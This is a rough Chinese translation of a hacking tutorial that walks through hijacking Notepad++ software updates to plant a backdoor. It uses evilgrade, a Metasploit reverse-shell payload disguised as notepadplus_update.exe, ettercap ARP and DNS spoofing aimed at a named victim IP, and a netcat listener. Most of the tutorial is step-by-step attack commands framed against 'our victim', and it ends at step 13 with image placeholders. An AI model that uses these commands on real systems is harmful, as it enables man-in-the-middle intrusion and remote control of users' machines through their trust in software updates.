如何劫持軟件更新來安裝 Rootkit 的後門訪問

有無數種方法破解系統。如果我們想應用自己的系統,我們不應該忽視任何的可能性,我們需要搜索弱點保持警惕。在這次破解,我們將會看看濫用信任用戶對軟件更新,他們的系統上安裝監聽器/rootkit。

利用”值得信賴”的軟件更新

我們都看見這條消息 — —現在有可用的軟件更新!無一例外,我們相信此消息並下載的更新,大概是使我們更好地工作、 添加新功能,或使我們的系統更安全的系統。

如果,相反,當我們要提示下載更新,我們的系統會給出一個惡意的***控制安裝惡意軟件?這是我們要對我們的受害者在這裏做什麼 !

不同於其他******,這是一個獨立的,正是這樣的操作系統、 端口等。在這裏我們將濫用用戶信任,沒有一個操作系統或應用程序。

這將是我們爲 Null Byte, 做過的最複雜***之一,所以如果你是新來的***,你可能想回來後做點工作背景。這次破解也利用了我們做在早些時候教程使用中間人***,所以您可能想要先讀一下。

第 1 步: 安裝 NotePad + +

在這次破解,我們將使用Notepad + +作爲我們的示例軟件,我們將劫持其更新,所以您將需要將它安裝在一個系統上。在我的示例中,我下載了它到 Windows 7 的系統。

您可以下載最新版本的 Notepad + +.

第 2 步: 下載和安裝 EvilGrade

下一步,我們會安裝Infobytesec evilgrade,它被設計成一個模塊化的框架,使***者可以通過注射”evil”更新到不知道用戶的更新。我們可以下載從 GitHub evilgrade.

現在被稱爲evilgrade目錄。

mkdir -p /root/evilgrade

現在更改目錄。

cd /root/evilgrade

下一步我們解壓並安裝 evilgrade。

tar -xvf isr-evilgrade-2.0.0.tar.gz

第 3 步: 運行 Evilgrade

下一步我們需要運行 evilgrade。我們鍵入:

./ evilgrade

我們現在使用它從它自己的提示符運行於 evilgrade 交互式模式

evilgrade >

第 4 步: 列出模塊

現在,運行的 evilgrade,讓我們看看這些evilgrade 已建的模塊。在這裏,代表evilgrade模塊設計劫持其更新/升級過程的軟件。在這個技巧,當然,我們會劫持Notepad++升級。

正如你可以看到下面,evilgrade有許多其它的軟件模塊,但它遠覆蓋所有的軟件更新/升級。

show modules

p_w_picpath003

關鍵是要找到受害者是使用什麼程序,也是evilgrade的模塊和目標應用程序列表。

第 5 步: 配置Notepad

接下來,我們需要告訴我們想要劫持其升級的過程是什麼的軟件的 evilgrade。讓我們告訴 evilgrade 我們想要劫持notepadplus.

evilgrade>configure notepadplus

第 6 步: 查看 Notepad + + 模塊需要什麼參數

我們的下一步就是看哪些參數是evilgrade notepadplus模塊需要的功能。我們用類似下面的命令檢查這個Metasploit鍵入:

show options

p_w_picpath004

 

我們可以在上面的截圖中看到此模塊,需要我們到 Notepad + + 的軟件和更新,即 sourceforge.net 源點。此外,我們需要設置代理,將是我們想要在受害人在預期更新位置上安裝的惡意負載。

第 7 步: 生成一個Metsploit有效載荷

在,我們已經設置evilgrade了,我們需要開發一個惡意的有效載荷交付給升級軟件,而不是實際的升級。我們可以用Metasploit的做到這一點。

如果您按照我的Metasploit的其他教程,你知道,我們可以選擇一些不同的有效載荷使用Metasploit的(有效載荷是什麼,我們加載到受害系統給我們控制)。在這種情況下,我們將使用其中一個最基本的有效載荷,在reverse tcp shell.。

 

我們可以產生一個有效載荷而不使用以下命令打開Metasploit的。此命令需要從Metasploit的框架,並將其裝入一個利用一個叫做notepadplus_update.exe文件。

/pentest/exploits/framework/modules/payloads/windows

shell_reverse_tcp LHOST 192.168.1.104

> /root/evilgrade/notepadplus_update.exe

p_w_picpath005

請注意,如果您使用的是不同版本的Backtrack或kali,這些有效載荷模塊在不同的目錄。

第8步:啓動Evilgrade

接下來,我們必須啓動evilgrade 服務器。這是以一個簡單的初始命令。

evilgrade>start

第 9 步:添加Notepad++更新服務器作爲域

我們的下一步是添加Notepad++我們要劫持域名。我們可以通過添加一個進入ettercap的etter.dns欺騙模塊。這使我們能夠欺騙受害者的軟件更新源域名。

由於Notepad++是由SourceForge,我們添加下面一行的etter.dns文件結束。

notepad-plus.sourceforge.net A 192.168.1.104

p_w_picpath006

當然,你使用的IP地址應該是你想要更新過程來尋找你的邪惡更新IP地址。

第 10 步:配置iptables

iptables是Linux或UNIX內置防火牆/路由器。我們可以使用這個功能,路由的流量通過我們的系統在一箇中間人***。讓我們在您最喜愛的文本編輯器中打開etter.conf文件。

kwrite /etc/etter.conf

p_w_picpath007

如圖所見,通過文件當你滾動約三分之二,有一個條目,我已在 iptables 上突出顯示。簡單地取消註釋 (刪除 #) 到第二個和第三行,以便使用 iptables。

第 11 步: 開始 Ettercap

我們現在可以用下面的命令啓動 ettercap。

ettercap-Tqi eth0-P dns_spoof-M arp 192.168.1.114 192.168.1.104

條件:

-T  指定終端接口

-q  使用安靜模式

-i  eth0說,我們想要使用eth0作爲我們的接口

-P dns_spoof選定,我們想要使用 dns欺騙 plug in_

-M  arp說,我們想要使用 arp 中間人***上之間兩個 IP addresses_

第 12 步: 開啓 Netcat 監聽器

現在我們需要從我們的***機器啓動netcat 偵聽器。我們需要監聽的evilgrade應用程序定義的端口,在這種情況下,Notepad + + 的端口爲1234。

nc-l-p 1234

第 13 步: 打開 Notepad + +

現在,讓我們在受害者計算機打開 Notepad + +  。

p_w_picpath008


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章